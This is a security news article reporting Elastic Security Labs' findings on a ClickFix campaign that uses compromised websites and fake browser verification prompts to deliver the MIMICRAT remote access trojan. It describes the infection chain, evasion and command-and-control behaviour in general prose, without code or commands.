Security researchers have uncovered a sophisticated ClickFix campaign that hijacks legitimate websites to infect users with a novel remote access trojan known as MIMICRAT. By tricking visitors into running malicious PowerShell commands under the guise of fake browser verification prompts, attackers gain deep system access for potential data theft or ransomware deployment.
Security experts at Elastic Security Labs recently identified an advanced cyberattack strategy that leverages compromised legitimate websites across various industries to distribute a previously unknown malware named MIMICRAT. This campaign utilizes a social engineering technique called ClickFix, which presents users with fraudulent error messages or verification pages, such as fake Cloudflare prompts. These lures deceive victims into copying and pasting malicious PowerShell scripts directly into their Windows Run dialog boxes to supposedly resolve a technical issue.
The technical execution of this campaign reveals a high degree of complexity, starting with the injection of malicious JavaScript into trusted platforms like a bank identification validation service. Once a victim executes the initial command, a multi-stage infection process begins. A secondary PowerShell script is retrieved from a remote server, which is specifically designed to disable Windows security features like Event Tracing and the Antimalmarware Scan Interface. This ensures the subsequent stages of the attack can proceed without being detected by standard antivirus software.
Following the bypass of system defenses, the attack deploys a specialized loader scripted in Lua. This loader is responsible for decrypting and executing shellcode within the system memory, which finally installs the MIMICRAT implant. MIMICRAT itself is a powerful remote access tool written in C++ that provides attackers with extensive control over the compromised machine. It includes capabilities for token impersonation, file system manipulation, and establishing encrypted tunnels to bypass network security.
To maintain a low profile, the malware communicates with its command-and-control infrastructure using standard HTTPS traffic on port 443. It employs specific data profiles that mimic legitimate web analytics, making the malicious data transfers blend in with normal internet activity. The developers of this campaign have also localized their lures into 17 different languages, allowing the attack to automatically adapt to the victim's browser settings and broaden its global reach across different regions and languages.
Early evidence suggests that this operation shares infrastructure and tactics with other known malware campaigns, indicating a coordinated effort by sophisticated threat actors. While the specific primary objective remains under investigation, researchers believe the ultimate goal is likely the exfiltration of sensitive corporate data or the eventual deployment of ransomware. Victims identified so far range from academic institutions in the United States to various users across Asia, highlighting the broad and opportunistic nature of the threat.
Source: ClickFix Campaign Uses Compromised Sites To Deliver MIMICRAT Malware